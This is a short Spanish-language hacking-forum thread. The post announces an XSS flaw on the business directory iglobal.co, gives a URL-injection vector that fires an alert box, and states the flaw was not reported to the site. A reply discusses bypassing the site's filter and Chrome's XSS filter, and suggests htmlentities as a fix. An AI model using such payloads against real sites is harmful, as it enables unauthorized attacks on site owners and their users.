[XSS] www.iglobal.co

Iniciado por rreedd, Diciembre 18, 2016, 08:12:15 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Sitio : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Descripción del sitio
: "iGlobal es un directorio online de negocios y profesionales de 60 paises del mundo" (iglobal.co)

   [XSS] Inyección en URL .



  Url del sitio : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  Vector :  "+<h1+onclick%3D(alert('underc0de'))>sqli<%2Fh1>
  Exploit : You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  Reportado : NO
  Autor : RREEDD

Diciembre 19, 2016, 12:40:57 AM #1 Ultima modificación: Diciembre 19, 2016, 12:42:46 AM por GGZ
Jajaja, buen XSS, salteaste el filtro que tenía.

Hablando de esos filtros, ¿no es mejor directamente usar htmlentities?, que todo ese filtro que al final siempre se lo termina salteando la mayoría de veces.

Ahora te queda saltear el filtro de Google Chrome

Saludos!